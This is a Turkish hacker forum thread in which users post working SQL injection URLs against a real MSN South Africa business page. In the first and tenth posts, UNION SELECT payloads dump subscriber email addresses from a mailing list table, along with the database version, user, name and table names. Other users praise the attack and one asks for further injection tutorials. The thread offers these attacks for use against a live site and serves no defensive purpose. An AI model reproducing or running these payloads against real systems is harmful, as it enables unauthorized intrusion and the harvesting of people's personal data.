Msn.Com Sql İnjection

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    http://business.za.msn.com/msn/view_article.php?id=-1+UNION+ALL+SELECT+1,email,3,4,5,6,7+from+mailing_list

     

    sitedeki kamillerin mailleri subdomaindir.


    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ThEDARq
    ThEDARq's avatar
    Kayıt Tarihi: 01/Eylül/2008
    Erkek
    Sql Injection Fakiri ilgay :)

    || Beyaz Atlı Prensini Bekleme,Seyize Razı Ol,Yoksa Beygire Kalırsın..||
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    chelishky
    chelishky's avatar
    Kayıt Tarihi: 26/Mayıs/2008
    Erkek
    ooo yeah bu hızda devam edersen,geleceğini iyi görüyorum senin hoca.Taktir ediyorum :).

    chelishky.wordpress.com|| Büyük devrimlere gereksinimin kalmayacak kadar devrimci kal yeter!
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Nitrous
    Nitrous's avatar
    Kayıt Tarihi: 01/Nisan/2007
    Erkek
    ne geleceği fQ..adam milw0rm çocuu oldu:D

    << Nitrous@TahriBaT.com >>
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mirza Efe
    _Dert_
    _Dert_'s avatar
    Kayıt Tarihi: 12/Aralık/2007
    Erkek
    Vay beee microsoft php kullanıyor :) ilk defa dikkatimi cekti..

  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Muhalif Yorumcu
    SeRDaR
    SeRDaR's avatar
    Kayıt Tarihi: 09/Kasım/2003
    Erkek
    şapka çıkartırım bu olaya bravo EcHoLL

    bana "php" ve "asp.net" de sql injeksiyon ile ilgili döküman önerecek olna varmı bakın asp demiyorum gerçekten şözmek istiyorum birde mesela bulunamayan column ve table adlarına ne gibi yöntemler uygulanıyor piyasada var ama hep sadece .asp üzerine basit unclosed dir cart curt ben php ve asp.net de çözmek istiyorum yabancı sitelerde dende bulamadım dil yok

    Önemsediğin Kadar Önemsenirsin. Önemsendiğin Kadar Önemsensersin.
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Nitrous
    Nitrous's avatar
    Kayıt Tarihi: 01/Nisan/2007
    Erkek
    ben firefox kullandıklarını bile gördüm..bi ss wardı nasıl indirileceğini anlatıyordu orda gördüm.bill gates pardus kullanıyo die söylentiler bile war:D

    << Nitrous@TahriBaT.com >>
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek
    Nitrous bunu yazdı:
    -----------------------------
    ben firefox kullandıklarını bile gördüm..bi ss wardı nasıl indirileceğini anlatıyordu orda gördüm.bill gates pardus kullanıyo die söylentiler bile war:D
    -----------------------------
    koptumya :) muhamhuamhua bilgates pardusmu kullanıyoruş :) ben MAC diye duymuştum pardusamı geçmiş vay ipina

    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    stillalive
    stillalive's avatar
    Kayıt Tarihi: 06/Mart/2007
    Erkek
    kurcalansa çok şey çıkar bundan.

    Geçenlerde kumpircide otururken, salataları, kaşarlı kumpirleri ve kısırları gördüm, o sırada şöyle düşündüm: Kısırlaştırılmış Siyaseti, Kaşar Siyasetçilerden Alırsak, Önümüze Amerikan Salatası Olarak Gelir Ve Biz de Onu Yeriz, Ama Orada Unutulan Birşey Var, O da Çoban Salatası.
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    TR_ip
    TR_ip's avatar
    Kayıt Tarihi: 31/Temmuz/2005
    Erkek

    Alalala... :) Bunu ben geçen hafta bulmuştum  hatta holy le biraz kurcalamistik bi holy_one & Rene ve benim gerçek hayattan 2 arkm  biliodu bitek :D Başkalarida farketti demekki..  :) neyse madem ortaya çıktı burasi :) Ozaman buyrun beyler bende yazim çıkarttıklarımı... :):) 

     

    Mail ler : 

    http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,%20email%20,3,4,5,6,@@version+from+mailing_list%20limit%201,900000000

    http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,%20email%20,3,4,5,6,user()%20+from+mailing_list%20limit%201,900000000

    Versiyonlar ve Mailler : 

    http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,%20email%20,3,4,5,6,concat(user(),ascii(32),@@version)%20+from+mailing_list%20limit%201,10

    http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,email,3,4,5,6,7+from+mailing_list%20limit%201,900000000

    İşlem Yapılan Tablo İsimleri :

    http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,2,3,4,5,6,7

    Database İsmi : 

    http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,database(),3,4,5,6,7

    Db Deki Genel Tablo İsimleri :

    http://business.za.msn.com/msn/view_article.php?id=99999+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables

    Database İçindeki Tablolar : 

    http://business.za.msn.com/msn/view_article.php?id=99999+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables+where+table_schema=char(109,97,114,107,101,116,118,105,101,119,115,50)

     

    Daha yapilcak çok şey varda :) + Şunuda söyliyim çok bölümünde dha sql injection var sistemin :)


    Kontakt : TR_ip@tahribat.com
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    HighNitro
    HighNitro's avatar
    Kayıt Tarihi: 21/Ağustos/2005
    Erkek
    TR_ip bunu yazdı:
    -----------------------------

    yuh be gnka vur dedik öldürmüşsün :D

    bide daha bissürü sql varmışmış :|

    google dan bişeler çıkartmanda yakındır haa :|

     

Toplam Hit: 4156 Toplam Mesaj: 24